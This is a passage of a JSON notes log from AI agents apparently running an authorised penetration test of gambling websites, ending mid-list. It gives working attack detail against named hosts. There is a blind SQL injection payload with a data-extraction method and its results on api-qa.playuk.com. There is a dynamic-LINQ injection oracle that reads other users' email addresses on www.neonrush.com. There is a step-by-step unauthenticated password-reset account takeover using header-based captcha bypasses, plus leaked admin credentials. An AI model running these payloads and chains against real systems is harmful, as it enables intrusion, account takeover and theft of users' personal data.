**tenant 1**.\n\n## Other verified corrections\n- `registerExternalFromApi` accounts **can never log in** (the supplied password is not applied; TokenAuth returns \"Invalid user name or password\"). Prior gaps that treated this endpoint as a session source are closed.\n- Tenant-17 reset: `sendpasswordresetcode?sendEmail=false` with `Abp.TenantId: 17` DOES return a real code for a real tenant-17 account (observed `74552593D5`), but `resetpassword` on tenant 17 returns 500 \"You must prove that you are not a robot.\" **before** any reset-code validation — i.e. the vuln-0036 reset *step* is Turnstile-gated on the default tenant. Turnstile is not solvable from this sandbox (headless Chrome: console `[Cloudflare Turnstile] Error: 600010`, iframe \"Verification failed\", widget yields no token; the Login button stays disabled).\n- The Turnstile form field name is `cf-turnstile-response` (NOT `cogni-turnstile-response`); supplying a bogus token changes the error to \"Unable to determine that you are not a robot.\", proving the server calls Cloudflare siteverify.\n\n## Verified escalation on tenant 1 (revises vuln-0027)\nUsing the tenant-1 session (freely obtainable: captcha-free register, or vuln-0036 ATO), the `sorting` dynamic-LINQ injection resolves the entity member `it.UserNameOrEmailAddress`, which holds the real login identifier while the API's DTO always returns `userNameOrEmail: null` (it maps the non-existent `it.UserNameOrEmail`). Blind-extracted OTHER users' e-mail addresses are confirmed (control: attacker 1854377 vs victim 1854378 = `b2ab7@x.com`; independently created 1853837 = `RTB1790531911@example.com`). The entity exposes **no navigations** (User/Player/Tenant/CreatorUser all fail to resolve), so no password-hash read; a route-wide injectability sweep of the published service map found no other injectable GET endpoint.", "agent_name": "Independent Red Team Lead 1", "agent_id": "c30e7dd1", "by_you": true}, {"note_id": "e32da4", "title": "BOUNDED DB PROOF — api-qa.playuk.com (MySQL/Percona) + www.neonrush.com (MSSQL)", "category": "findings", "tags": ["db-access", "bounded-proof", "playuk", "neonrush", "mysql", "mssql", "sql-injection", "vuln-0027", "vuln-0028"], "created_at": "2026-09-27T21:24:43.454510+00:00", "updated_at": "2026-09-27T21:28:08.982169+00:00", "content": "# Bounded database-access proof — two in-scope targets\n\nAgent: DB Proof Extractor (bounded). Objective: demonstrate and characterise the two confirmed database-access primitives with a MINIMAL, proof-grade extraction — metadata, schema inventory, row counts, and one small non-sensitive sample. **No bulk/table dump was performed** (deliberately bounded; see \"Exposure\" below).\n\nThis note strengthens the evidence for the two existing findings (playuk `isBonusCodeValid` bonusCode SQLi → vuln-0028; neonrush ABP `sorting` dynamic-LINQ injection → vuln-0027). **No duplicate report was filed.**\n\n---\n\n## Target A — `api-qa.playuk.com` (Markor \"Revolve\" player API)\n\n**Vector:** time-based blind SQLi in `POST /revolve/api/account/isBonusCodeValid`, JSON field `bonusCode`\n(payload: `TESTCODE' AND IF((<bool>),(SELECT 1 FROM (SELECT(SLEEP(n)))z),0) AND 'a'='a`).\n**Session:** freely self-registered player (`POST /revolve/api/register/lite` → `SessionCorrelationId`); no special access needed.\n**Method:** sleep-based boolean oracle (n=0.8 s, threshold ~0.6 s), queries issued in parallel (16 workers, ~18 req/s) because each character costs ~7 sequential requests. ~0.25 s per false request, ~1.05 s per true request.\n\n### DBMS identity (extracted)\n```\nVERSION()          = 8.0.42-33\n@@version_comment  = Percona Server (GPL), Release 33, Revision 9dc49998\nDATABASE()         = revolve\nUSER()             = revolve@10.99.2.90        <-- the app's DB account + internal source IP\nCURRENT_USER()     = revolve@10.99.2.%\n```\n\n### Schema inventory\n- **519 tables**, **5 views**: `exchange_rate, vw_jackpot_value, vw_player_kpi, vw_player_segment, vw_transaction`.\n- Alphabetical head (first ~450 chars, i.e. first ~23 tables): `3k_hardstop_threshold, account, account_reversal_job_execution_history, account_type, acquisition_group, acquisition_group_player, adobe_message_service_config, adventure_points_log, adventure_reward_level, affiliate, affiliate_campaign, affiliate_site, affordability_level, aml_level, audit_log, bambora_paynplay_details, batch_job_execution*, batch_job_instance, batch_job_seq, batch_step_…`\n- **Validated table names** (each confirmed by an `information_schema` existence query): `account, player, transaction, transaction_details, transaction_subtype, transaction_type, account_type, audit_log, bonus, bonus_code, payment_record, payment_record_details, payment_method, payment_provider, card_detail, card_type, player_aml_details, player_kyc_history, promotion, promotion_prize, manual_audit_log, vip_audit_log, kyc_level, player_big_win_history, player_blocked_card_details, player_blocked_payment_methods, site_kyc_threshold, external_payment_transaction, jackpot_transaction, game, cms_promotion, bonus_acquisition_group, inactive_account_job_history, account_reversal_job_execution_history`.\n- Pattern-derived families (bounded lists, representative): `player_*` (activity, aml_details, affordability_history, big_win_history, blocked_card_details, blocked_payment_methods, kyc_history, adventure_reward_level_history…), `bonus_*` (code, code_batch, config_payout, currency_conversion_rates, acquisition_group, by_payment_method, allowed_country…), `payment_*` (method, provider, provider_site, record, record_details, record_history, solution), `promotion_*`/`cms_promotion*`, `kyc_*`/`site_kyc_*`, `*audit*`, `card_detail/card_type`.\n- Table families confirmed **absent**: bare `user*`, `wallet`, `balance`, `bank`, `wager`, `bet`.\n\n### Row counts (principal tables) — all confirmed by 3-vote majority equality test\n| table | rows |\n|---|---|\n| `audit_log` | 624,894 |\n| `transaction` | 363,203 |\n| `account` | 248,719 |\n| `player` | 56,208 |\n| `bonus` | 25,137 |\n| `transaction_details` | 284 |\n| `transaction_subtype` | 70 |\n| `account_type` | 8 |\n\n*Cross-check:* `account_type = 8` is corroborated by the identical number of data rows observed in the bounded sample extraction below.\n\n### Column inventory (validated by `information_schema.columns`)\n- `account`: `id, version, balance, currency_id, is_active, player_id, type`\n- `account_type`: `id, version, is_default, name, short_name, is_adjustable`\n- `transaction_subtype`: `id, version, description, name, short_name, transaction_type_id, is_manual_subtype`\n\n### Small non-sensitive sample (read end-to-end, bounded)\n`account_type` (a lookup table), extracted as `id|version|is_default|name`:\n```\n1|0||Cash;2|0||Comp;3|A||Bonus;4|0||Demo;6|0||Loyalty;7|0||Freespin;8|0||OverdraftCash;9|0||Overdraftbonus\n```\nThis is genuine reference data returned from the backend MySQL — proof of read access, and it matches the confirmed row count of 8. No player PII, balances, credentials or transaction rows were extracted.\n\n**Cost:** ~16,600 requests / 946 s for the inventory + ~3,900 for metadata/columns/sample + ~630 for count confirmation ≈ **~21k requests, ~28 min**.\n\n---\n\n## Target B — `www.neonrush.com` (Cogni / ASP.NET Boilerplate)\n\n**Vector:** EF Core dynamic-LINQ expression injection in the `sorting` parameter of `GET /api/services/app/userlogin/getuserloginattempts` → SQL. Boolean oracle: `sorting=IIF(<pred>, it.Id, it.Id/(it.Id-it.Id))` → HTTP 200 (true) / HTTP 500 (SQL divide-by-zero, false).\n**Session:** obtained with **no credentials** (`Abp.TenantId: 1` skips the anti-bot policy + `X-Forwarded-For: 8.8.8.8` passes the geo-gate → register → session cookie). The `userId` parameter is not ownership-scoped, so a second user's row is readable (IDOR).\n\n### DBMS fingerprint\n- **Microsoft SQL Server** — evidence: (a) `IIF(1=0, it.Id, it.Id/(it.Id-it.Id))` → 500, i.e. an integer divide-by-zero **raises** (rules out MySQL, which yields NULL); (b) string equality is **case-insensitive** (`it.Result == \"success\"` and `== \"Success\"` both true); (c) equality is **trailing-space insensitive** (`it.Result == \"Success \"` → true), which is SQL Server's default ANSI-padded comparison semantics (PostgreSQL would be false).\n- **Not reachable via this sink:** engine version, schema/table list, or any catalog view. The injected expression is bound to the queryable entity, only that entity's mapped members are evaluable, and there is no resolvable metadata function (`EF.Functions.Like` → 500, `typeof`/reflection → 500, no subquery capability). This confirms the earlier closure that neonrush does **not** expose schema/version metadata through the injection (engine *type* is the only metadata obtainable, by behavioural fingerprint).\n\n### Entity column inventory (`UserLoginAttempt`), via member-existence oracle\n- **Resolves:** `Id`, `TenantId`, `UserId`, `UserNameOrEmailaddress`, `ClientIpAddress`, `BrowserInfo`, `Result` (enum), `FailReason`, `CreationTime`, `TenancyName`.\n- **Does not resolve:** `ClientName`, `CreationTimeUtc`, `CreatorUserId`, `LastModificationTime`, `LastModifierUserId`, `IsDeleted`, plus ~40 tested navigation names (entity has no navigation property).\n\n### Extracted values (victim's row; blind extraction via the boolean oracle)\n```\nhidden Id      = 22523494        (primary key — never returned by the API)\nhidden UserId  = 1854182         (== the victim account's id)\nhidden TenantId= 1\nstring read    = it.TenancyName -> \"cognisweeps\"  (== \"CogniSweeps\"; case folded by the CI collation)\n```\nControl: `IIF(it.Id == 22523494, …)` → 200 and `IIF(it.Id == 22523495, …)` → 500 (exactly one row).\n**Row count:** `totalCount = 1` for the victim's login-attempt set (per-user; the endpoint is user-scoped, so no global count is exposed).\n**Cost:** ~211 requests / ~2 min. Each request is ~0.3 s and non-destructive (read-only ORDER BY evaluation).\n\n---\n\n## Exposure statement (for the client)\n- **PlayUK (`revolve`):** any table/column in the `revolve` schema is readable through the same injection — the inventory above shows the reach (player, account, transaction, payment, KYC, bonus tables). A **full extraction is technically possible** but was deliberately **not** performed; only metadata, counts and one lookup-table sample were taken. Read-only; no write/update primitive was exercised.\n- **NeonRush:** the primitive reads columns of the queried entity (including columns the API never returns) and resolves a related-table navigation at the SQL level, but arbitrary-table/catalog access is **not** available through this sink, and the populated tenant (17) could not be reached to extend it.\n\n## Honest limits\n1. Time-based blind extraction is lossy (~2–5% per-character error rate under load). Every table/column name reported above was **validated by an independent existence query**; initial extraction errors (`execvtion`, `traqsaction`, `descripuion`, `short_nbme`) were corrected this way. All row counts were confirmed by a 3-vote majority equality test — raw single-shot binary-search estimates were unreliable (e.g. `account_type` was mis-estimated as 147,457; the confirmed value is 8).\n2. No data was modified and no bulk rows were exported.\n3. `api-uat.playuk.com` was not exercised (anti-fraud `code 3` blocks session acquisition from this egress); the same build is presumed affected.", "agent_name": "DB Proof Extractor (bounded)", "agent_id": "e55dc715"}, {"note_id": "c9af1f", "title": "Independent verification (IRT Lead 1) — vuln-0036 CRITICAL unauth account takeover on www.neonrush.com CONFIRMED", "category": "findings", "tags": ["neonrush", "vuln-0036", "account-takeover", "password-reset", "independent-verification", "critical", "irt-lead-1", "c30e7dd1"], "created_at": "2026-09-27T21:20:25.095707+00:00", "updated_at": "2026-09-27T21:20:25.095707+00:00", "content": "**Agent:** Independent Red Team Lead 1 (c30e7dd1). I independently reproduced the critical finding **vuln-0036** end-to-end from a clean client (fresh account, no victim privileges, no mailbox).\n\n## Reproduction (script `/workspace/irt_verify_reset.py`)\n1. Registered a fresh victim (tenant 1, `X-Forwarded-For: 8.8.8.8`) → `userId=1854419`.\n2. **Unauthenticated** `POST /api/services/app/playeraccount/sendpasswordresetcode?sendEmail=false` with body `{\"emailAddress\":\"<victim>\"}` → HTTP 200, `result.code = \"E17009DD35\"` (the server-side reset secret returned to the caller; with `sendEmail` absent/true it is `null`).\n3. `POST /api/services/app/playeraccount/resetpassword` with `{\"UserId\":\"1854419\",\"ResetCode\":\"E17009DD35\",\"Password\":\"<attacker>\",\"expireDate\":\"2031-01-01T00:00:00\"}` → HTTP 200 `{\"canLogin\":true,...}`. The caller-supplied FUTURE `expireDate` is accepted, defeating the code's real lifetime.\n4. Login with the **original** password → **HTTP 401**. Login with the **attacker-chosen** password → **HTTP 200** and a `.AspNetCore.Identity.Application` session cookie was set.\n5. `GET /api/services/app/session/getcurrentlogininformations` → returns the victim identity (`userName/emailAddress = irt.verify...@example.com`) — an authenticated victim session held by an unauthenticated attacker.\n\nControl: the original password no longer authenticates, so this is a true credential change on the target account, not a decoy code.\n\n## Independent nuance (adds to the report)\n- Tenant 17 (`Abp.TenantId: 17`) returned `result.code = null` **for the tenant-1 email** — i.e. disclosure is per-existing-account within the selected tenant, so it exposes the code only for accounts that exist in that tenant (consistent with the report's tenant-17 example, which used a tenant-17 account). The full chain including the final login was demonstrated on the captcha-free tenant 1.\n- Remaining gate for the POPULATED tenant 17: the reset step adds Cloudflare Turnstile. Since the site key is public (and the Turnstile secret is separately leaked under vuln-0024), a real client can satisfy it; the code disclosure itself is still returned for existing tenant-17 accounts.\n- This directly unblocks the crown-jewel cross-user path (tenant-17 session → `getuserloginattempts` IDOR vuln-0023 → EF Core dynamic-LINQ injection vuln-0027), which prior agents were blocked on.\n\n## Assessment\nvuln-0036 is correctly rated **Critical (9.1)** for the captcha-free tenant population; severity is defensible. The PoC, counterevidence and controls in the report are sound. No new report filed (dedup — I corroborated the existing one).", "agent_name": "Independent Red Team Lead 1", "agent_id": "c30e7dd1", "by_you": true}, {"note_id": "d9456e", "title": "CVE→RCE component inventory (vulnx) — versions, ranges, pre/post-auth, exploit availability", "category": "findings", "tags": ["cve", "rce", "inventory", "vulnx", "component-mapping", "b36d5cbb", "nonmachine", "guacamole", "wordpress", "nextjs"], "created_at": "2026-09-27T21:11:53.665908+00:00", "updated_at": "2026-09-27T21:11:53.665908+00:00", "content": "Agent: Component CVE-RCE Mapper (b36d5cbb), parent Independent RCE-Candidate Inventory Agent (3b5f3832).\nMethod: LOCAL `vulnx` CLI only (product search + `vulnx id` per CVE). NO target traffic, NO exploitation, NO 0day. Artifacts: /workspace/vulnx_out/*.json (broad product searches + per-CVE id records with description/remediation/is_poc/poc_count/ntps/is_kev).\n\nvulnx field semantics used: requirement_type: none=pre-auth, logged_in=post-auth, admin_privileges=post-auth(admin), user_interaction=needs victim action. is_poc+poc_count = public exploit reference(s); ntps = nuclei-template priority score (blank/none = no template).\n\n## HEADLINE\n- NO fingerprinted component has a CONFIRMED, in-range, PRE-AUTH, network-reachable RCE that is also reachable per the pack.\n- The two \"0day-style\" NoMachine CVEs the pack leaned on are **REJECTED** in vulnx: CVE-2026-18264 (post-auth, port 4000 cmd injection) and CVE-2026-53694 (<9.5.7, out of range) — both status=rejected.\n- Several pack-cited CVEs are REJECTED/fixed: CVE-2026-75604 (Next.js, Windows-only, rejected), CVE-2026-71318 + CVE-2026-71320 (Nuxt island SSTI, both rejected), CVE-2026-18264/53694 (NoMachine, rejected).\n- Every Guacamole RCE CVE is OUT OF RANGE for 1.6.0. Every LiteSpeed-Cache priv-esc/RCE CVE is OUT OF RANGE for 7.8.1. Every actionable Tomcat RCE CVE is OUT OF RANGE for 9.0.121.\n\n## CONTRADICTIONS vs the prior pack (correct these)\n1. CVE-2026-18264 — pack treated as real (auth-gated). vulnx: status=REJECTED. Do not track as valid.\n2. CVE-2026-53694 — pack \"N/A <9.5.7\". vulnx: status=REJECTED too.\n3. CVE-2026-75604 (Next.js) — pack \"Windows-only\". vulnx: status=REJECTED (also Win-only). Not a valid CVE.\n4. CVE-2026-71318 / 71320 (Nuxt) — pack \"ruled out (no island endpoint)\". vulnx: BOTH status=REJECTED.\n5. CVE-2024-35164 (Guacamole) — pack implied a live candidate; vulnx remediation = \"Upgrade to 1.6.0 or later\" → host 1.6.0 is PATCHED.\n6. NoMachine local priv-esc family (CVE-2025-8614, 2026-5053/5054/5055) — all POST-AUTH/local (logged_in), not remote; host 10.0.59.\n\n## TABLE (component | version | CVE | CVSS | status | auth | class/impact | affected range | in-range | exploit/tmpl | notes)\nOpenSSH sshd | 9.6p1 Ubuntu 3ubuntu13.19 | CVE-2024-6387 | 8.1 | modified | pre-auth | race condition → RCE (regreSSHion) | upstream 8.5p1–9.7p1 | N (vendor-backported) | PoC yes (poc_count=100), nuclei ntps=73, KEV | 9.6p1 nominally in upstream range, but Ubuntu 3ubuntu13.x backports the fix (fix at .3; fingerprint .19) → treat as PATCHED; verify.\nOpenSSH sshd | 9.6p1 | CVE-2023-38408 | 9.8 | modified | pre-auth* | ssh-agent PKCS#11 command injection → RCE | < 9.3p2 | N | poc_count=23, ntps=81, KEV | 9.6p1 > 9.3p2, patched.\nOpenSSH sshd | 9.6p1 | CVE-2023-51385 | 6.5 | modified | pre-auth* | ProxyCommand OS command injection | < 9.6 | N | poc_count=25, ntps=51 | fixed in 9.6 → host is exactly 9.6p1, patched.\nOpenSSH sshd | 8.0 (77.68.12.66) | CVE-2023-38408 | 9.8 | modified | pre-auth* | ssh-agent PKCS#11 cmd injection → RCE | < 9.3p2 | Y | poc=23, ntps=81, KEV | 8.0 < 9.3p2 → IN RANGE; precondition = agent forwarding to attacker-controlled host (req none).\nOpenSSH sshd | 8.0 | CVE-2023-51385 | 6.5 | modified | pre-auth* | ProxyCommand injection | < 9.6 | Y | poc=25, ntps=51 | IN RANGE; needs untrusted hostname w/ shell metachars.\nOpenSSH sshd | 8.0 | CVE-2024-6387 | 8.1 | modified | pre-auth | race → RCE | 8.5p1–9.7p1 | N | — | 8.0 below 8.5p1 → not regreSSHion.\nNoMachine NX | 10.0.59 (45.132.74.81:4000) | CVE-2026-18264 | 8.8 | REJECTED | post-auth | cmd injection (web svc :4000) | n/a | N | none | REJECTED; pack over-weighted this.\nNoMachine NX | 10.0.59 | CVE-2026-53694 | n/a | REJECTED | pre-auth | argument/command injection | <9.5.7/8.23.2 | N | poc=1 | REJECTED + out of range.\nNoMachine | 10.0.59 | CVE-2023-39107 | 9.1 | modified | pre-auth | arbitrary file overwrite → privesc | macOS <8.8.1 | N | poc=1 | wrong OS + version.\nNoMachine | 10.0.59 | CVE-2025-8614 / 2026-5055 / 5054 / 5053 | 7.8/7.8/7.8/7.1 | confirmed | POST-auth (local) | uncontrolled search path / path trav / BAAC → privesc RCE (SYSTEM) | version not stated | unclear | ntps=19 | local low-priv first; host is 2026 build 10.0.59.\nApache Guacamole | 1.6.0 | CVE-2024-35164 | 6.8 | modified | pre-auth | terminal cmd injection → RCE (guacd) | <= 1.5.5 | N | none | PATCHED in 1.6.0 (remediation says upgrade to 1.6.0).\nApache Guacamole | 1.6.0 | CVE-2023-43826 | 7.5 | modified | pre-auth* | integer overflow → RCE | 1.5.3 and older | N | none | out of range.\nApache Guacamole | 1.6.0 | CVE-2023-30576 | 6.8 | modified | undefined | use-after-free → RCE | 0.9.10–1.5.1 | N | none | out of range.\nApache Guacamole | 1.6.0 | CVE-2023-30575 | 6.5 | modified | pre-auth | instruction injection | 1.5.1 and older | N | ntps=24 | out of range.\nApache Guacamole | 1.6.0 | CVE-2021-43999 | 8.8 | modified | pre-auth* | SAML response validation → auth bypass | 1.2.0/1.3.0 | N | none | out of range (needs SAML enabled).\nApache Tomcat | 9.0.121 | CVE-2025-24813 | 9.8 | confirmed | pre-auth | path equivalence (partial PUT) → RCE | 9.0.0-M1–9.0.98 (also 10.1<34, 11<2) | N | poc yes, ntps=88, KEV | 121 > 98 → fixed; highest-value Tomcat CVE but not in range.\nApache Tomcat | 9.0.121 | CVE-2024-50379 (+56337) | 9.8 | modified | pre-auth | TOCTOU JSP compile → RCE | 9.0.0.M1–9.0.97 | N | poc yes, ntps=67 | out of range.\nApache Tomcat | 9.0.121 | CVE-2026-65183 | 8.1 | confirmed | local | TOCTOU unix-socket creation | 9.0.42–9.0.120 | N | ntps=50 | 9.0.121 fixed; local-only anyway.\nApache Tomcat | 9.0.121 | CVE-2025-55754 | 9.6 | modified | n/a | ANSI escape injection in logs (not RCE) | 9.0.40–9.0.108 | N | ntps=55 | out of range; mislabelled RCE.\nApache Tomcat | 9.0.121 | CVE-2020-1938 (Ghostcat) | 9.8 | confirmed | pre-auth | AJP file read/include → RCE | <=9.0.30 | N | — | out of range.\nnginx | 1.24.0 (Ubuntu) | (broad) | — | — | — | no in-range RCE | — | N | — | only pre-1.21 CVEs (CVE-2021-23017 etc.) → patched.\nMariaDB server | 10.5.29 | CVE-2026-48165 / 48163 | 8.0 | modified | post-auth | SST (Galera) command injection | 10.6.1+/10.11+/11.4+/11.8+/12.3 | N | ntps=27 | 10.5 branch NOT listed → out of range; needs high-priv DB user / malicious joiner.\nMySQL server | 8.0.42-33 | CVE-2024-21096 | 4.9 | confirmed | post-auth | mysqldump client-side cmd injection | 8.0.36 and prior | N | ntps=26 | out of range; low.\nPlesk Obsidian | 18.0.80 b.8 | CVE-2025-66430 | 9.1 | confirmed | pre-auth | broken access control (NOT RCE) | Plesk 18.0 | likely Y | ntps=60 | in-range authz flaw, no RCE primitive recorded; verify fixed build.\nPlesk Obsidian | 18.0.80 b.8 | CVE-2023-4931 | 6.3 | modified | local | installer DLL hijacking | — | unclear | — | local.\nProFTPD | unknown (77.68.12.66) | CVE-2019-12815 | 9.8 | modified | pre-auth* | mod_copy arbitrary file copy → webshell RCE | <= 1.3.5b | unclear | — | version unknown → verify; classic RCE if old.\nProFTPD | unknown | CVE-2015-3306 | 10.0 | modified | pre-auth | mod_copy SITE CPFR/CPTO → RCE | <= 1.3.5 | unclear | — | version unknown.\nProFTPD | unknown | CVE-2026-63091 | 6.5 | confirmed | post-auth | mod_sftp integer overflow (ASLR bypass) | <1.3.9c/1.3.10rc3 | unclear | ntps=34 | post-auth only.\nPure-FTPd | unknown | CVE-2024-48208 | 8.6 | confirmed | pre-auth | domlsd() OOB read → RCE | < 1.0.52 | unclear | poc=2, ntps=55 | version unknown → verify; strong candidate if old.\nWordPress core | 7.1.2 | CVE-2026-63030 | 9.8 | confirmed | pre-auth | REST batch route confusion + WP_Query SQLi → RCE | 6.9.x<6.9.5 and 7.0.x<7.0.2 | unclear | poc yes, ntps=85 | 7.1.x NOT in advisory range → likely patched; fingerprint may be imprecise → VERIFY. Critically the only pre-auth WP RCE to check.\nLiteSpeed Cache (plugin) | 7.8.1 | CVE-2024-28000 | 9.8 | modified | pre-auth* | weak-hash → priv-esc → RCE | 1.9–6.3.0.1 | N | poc=18, ntps=62, KEV | out of range.\nLiteSpeed Cache (plugin) | 7.8.1 | CVE-2024-50550 | 8.1 | modified | pre-auth* | privilege escalation | through 6.5.1 | N | ntps=28 | out of range.\nLiteSpeed Cache (plugin) | 7.8.1 | CVE-2024-47637 | 8.8 | modified | pre-auth | path traversal (file read) | through 6.4.1 | N | ntps=23 | out of range.\nLiteSpeed web server | (LSWS/LSWS Ent) | CVE-2026-31386 | 7.2 | confirmed | POST-auth (admin) | OS command injection | — | n/a | ntps=17 | requires admin → not pre-auth.\nContact Form 7 | 6.1.7 | (none core) | — | — | — | matches were 3rd-party add-ons | — | N | — | no in-range CF7-core RCE.\nRedirection | 5.9.0 | (none core) | — | — | — | matches were \"Redirection for CF7\" (different plugin) | — | N | — | no core RCE.\nAkismet | 5.7.2 | none | — | — | — | — | — | N | — | no RCE record.\nYoast SEO | 28.3 | CVE-2026-10821 (Premium) | 6.6 | rejected | post-auth | — | — | N | — | rejected; premium only.\nACF | 6.8.8 | CVE-2023-1196 | 8.8 | modified | post-auth (Contrib+) | PHP object injection → RCE if gadget | 6.x<6.1.0 / 5.x<5.12.5 | N | poc, ntps=33 | 6.8.8 out of range.\nresponsive-accordion-and-collapse | 2.5.3 | none | — | — | — | matches were unrelated plugins | — | N | — | no CVE record.\nWPML | (present) | CVE-2024-6386 | 9.9 | modified | POST-auth | authenticated SSTI → RCE | < 4.6.13 | unclear | — | version unknown → verify.\nSEOPress | (present) | CVE-2024-5488 | 9.8 | confirmed | pre-auth* | PHP object injection → RCE if gadget | < 7.6.1 | unclear | — | version unknown → verify.\nLimit-Login-Attempts-Reloaded | absent | none | — | — | — | — | — | N | — | plugin not installed on fleet.\nPHP | 7.4.33 (EOL) | CVE-2024-4577 | 9.8 | confirmed | pre-auth | PHP-CGI argument injection → RCE | Windows PHP-CGI only | N | — | N/A on Linux/FPM host.\nPHP | 7.4.33 (EOL) | (various) | — | — | — | mostly local/DoS | — | N | — | EOL = patch backlog; no confirmed pre-auth net RCE for FPM/CLI.\nNext.js / React (RSC) | several | CVE-2025-55182 | 10.0 | confirmed | pre-auth | RSC unsafe deserialization → RCE | RSC 19.0.0/19.1.0/19.1.1/19.2.0 | unclear | poc=100, ntps=85, KEV | in-range ONLY if app pins those RSC versions; pack verified patched on UAT apps → treat as patched but re-verify each Next.js build.\nNext.js | several | CVE-2026-75604 | 9.0 | REJECTED | pre-auth | path traversal (Win) → RCE | 13.4.0–<15.5.24 / 16.3.3 | N | poc=5 | REJECTED; Windows-only.\nReact (RSC) | — | CVE-2025-67779 / 55184 | 7.5 | modified | pre-auth | DoS | RSC | unclear | — | DoS not RCE.\nNuxt.js / Nitro | several | CVE-2026-71318 | 4.8 | REJECTED | pre-auth | /__nuxt_island/ template injection | 3.1.0–3.21.10 /4.x<4.5.1 | N | none | REJECTED.\nNuxt.js / Nitro | several | CVE-2026-71320 | 8.1 | REJECTED | pre-auth | /__nuxt_island/ template injection (needs runtimeCompiler) | 3.4.0–<3.21.10/4.5.1 | N | none | REJECTED.\nNuxt.js | several | CVE-2023-3224 | 9.8 | modified | pre-auth | SSTI | old | N | — | old version range.\nStrapi | (<5.37.0?) | CVE-2026-27886 | 7.5 | confirmed | pre-auth | query-param bypass → admin reset-token → ATO | 4.0.0–<5.37.0 | unclear | poc=3, ntps=45 | ATO, not direct RCE; verify UAT Strapi version.\nStrapi | — | CVE-2026-22707 | 5.4 | confirmed | POST-auth | stored XSS in Upload Content API | < 5.33.3 | unclear | ntps=27 | post-auth.\nStrapi | — | CVE-2022-27263 | 9.8 | modified | user_interaction | unrestricted file upload | — | unclear | — | old.\nNode.js | unknown | CVE-2023-32002 | 9.8 | modified | n/a | module policy bypass → RCE (loader) | Node <20.5.1/18.17.1/16.20.1 | unclear | — | verify Node version on Betty/Railway.\nNode.js | unknown | CVE-2021-22930 | 9.8 | modified | n/a | UAF | Node <16.6.2 | N | — | old.\nNode.js | unknown | CVE-2026-21636 | 10.0 | confirmed | n/a | privilege escalation (BAAC) | — | unclear | — | no range in record.\nNestJS | unknown | CVE-2025-54782 | 8.8 | confirmed | user_interaction | @nestjs/devtools-integration sandbox escape → RCE | devtool pkg <= 0.2.0 | N | poc, ntps=53 | DEV TOOL only; requires dev to load attacker page → not prod RCE.\nNestJS | unknown | CVE-2024-29409 | 5.5 | confirmed | user_interaction | unrestricted file upload | — | N | — | dev tool.\nExpress.js | unknown | CVE-2022-24999 (qs) | 7.5 | modified | n/a | qs prototype pollution | qs <6.10.3 | unclear | — | dep-level; no RCE sink verified.\nASP.NET MVC 5.2 / .NET 4.8 / IIS 10 | — | CVE-2017-7269 | 9.8 | confirmed | pre-auth | WebDAV ScStoragePathFromUrl overflow | IIS 6.0 only | N | — | OS/product N/A (IIS 10).\nIIS/.NET WebForms ViewState | — | (no CVE) | — | — | post-auth* | unsafe deserialization IF machineKey known | n/a | N | — | class not a CVE; pack: MAC enforced, no key leak.\nTelerik/Kendo/DevExpress | absent | CVE-2019-18935 etc | 9.8 | confirmed | pre-auth | .NET deserialization | — | N/A | — | NOT PRESENT on .NET hosts.\nASP.NET Boilerplate (ABP) | — | none in vulnx | — | — | — | framework; no CVE record | — | N/A | — | app-code dynamic-LINQ (vuln-0027) is not a component CVE.\nEF Core | — | none notable | — | — | — | — | — | N/A | — | 3 records, no RCE.\nAuth.js / NextAuth | — | none | — | — | — | no RCE CVE | — | N/A | — | acedbet.", "agent_name": "Component CVE-RCE Mapper", "agent_id": "b36d5cbb"}, {"note_id": "5057b9", "title": "Independent Red Team Lead 4 — review, hypotheses, coverage (agent 1839292c)", "category": "plan", "tags": ["independent-lead-4", "review", "hypotheses", "coverage", "neonrush", "playuk", "subdomain-takeover"], "created_at": "2026-09-27T20:58:27.476518+00:00", "updated_at": "2026-09-27T20:58:27.476518+00:00", "content": "# Independent Red Team Lead 4 — review of the 47-host staging PT evidence\n\n## Scope/ROE as understood\n47 authorized staging hosts + their own subdomains. Synthetic data. Vendor backends (progressplay.net, casino-pp.net, betable.com, hercules.app, convex.cloud, *.tech1960.workers.dev, payment providers) OUT OF SCOPE (observe-only). All work below is within the 47 + their subdomains.\n\n## What the engagement already established (crown jewels)\n- **NeonRush / Cogni (ABP, www.neonrush.com)** — verified pre-auth chain: `Abp.TenantId: 1` header bypasses Turnstile (vuln-0025) → `register/registerexternalfromapi` creates a login-capable account unauthenticated (vuln-0017) → low-priv session reads ARBITRARY users' login rows (vuln-0023) → EF Core Dynamic-LINQ `sorting` injection gives a blind SQL read + extracted a hidden PK (vuln-0027). SSO JWT minting for arbitrary players (vuln-0022). Turnstile secret leak (vuln-0024). No in-scope consumer for the SSO token; RCE via the LINQ injection ruled out (restricted type provider); tenant 17 (populated) unreachable (Turnstile fails closed).\n- **PlayUK / Markor \"revolve\" API (api-qa.playuk.com)** — confirmed time-based blind SQLi in `isBonusCodeValid.bonusCode` (vuln-0028, MySQL 8.0.42-33, db `revolve`); only version()/database() extracted. Unauth account enum (vuln-0009) + lockout DoS (vuln-0010). QA session is freely obtainable via `register/lite`.\n- **Betty admin (appmanager.tangobet.co.uk)** — weak creds admin/admin123 → full backoffice (vuln-0001); no login rate limit (vuln-0002); DELETE /api/admin/users/{id} leaks bcrypt hash (vuln-0019). JWT HS256 secret NOT recovered.\n- **WordPress fleet** — unauth user enum + `?rest_route=` WAF bypass (vuln-0007/0013); xmlrpc SSRF (vuln-0018) + no-throttle multicall (vuln-0014) but ATO not achieved. jackpot.com ALB `/%2fadmin` bypass (vuln-0005). Subdomain-takeover exposures (vuln-0004/0011/0012/0015). Dangling DNS.\n\n## Independent gaps I identified and am closing (my 5 agents)\n1. **NeonRush priv-esc (highest value, UNCONNECTED):** two open items were never combined — `registerExternalFromApi` accepted mass-assignment fields (`roleNames/isAdmin/roles`) but the author \"could not get a session\"; separately the tenant-1 header gives a captcha-free session. Chain: register via registerExternalFromApi with `Abp.TenantId:1` + role mass-assignment → captcha-free login → read `session/getcurrentlogininformations` → confirm admin. Agent f128e55f. Also cross-tenant IDOR on getuserloginattempts.\n2. **~11 Imperva-blocked hosts never observed** (luckcity, mrrex, mamzinobet, moneyplay, ne-bet, supabet, betblink, 21luckybet, lekkerbets, highstakes, hotwinscasino main). A real browser passed the JS challenge for several ProgressPlay hosts. Agent bf860d90 (overlaps leads 1/2 — independent re-check).\n3. **Subdomain-takeover CLAIMABILITY** (qa.*→cloudfront, api.*→deleted cloudfront, support.uk-bingo.net→zendesk-closed, games.luckcity/savibet→Cloudways, lobby.*→185.27.56.100, ftp/mail/smtp.betmorph→Duda). Agent 9e708a96 (unique to me).\n4. **Race/business-logic on 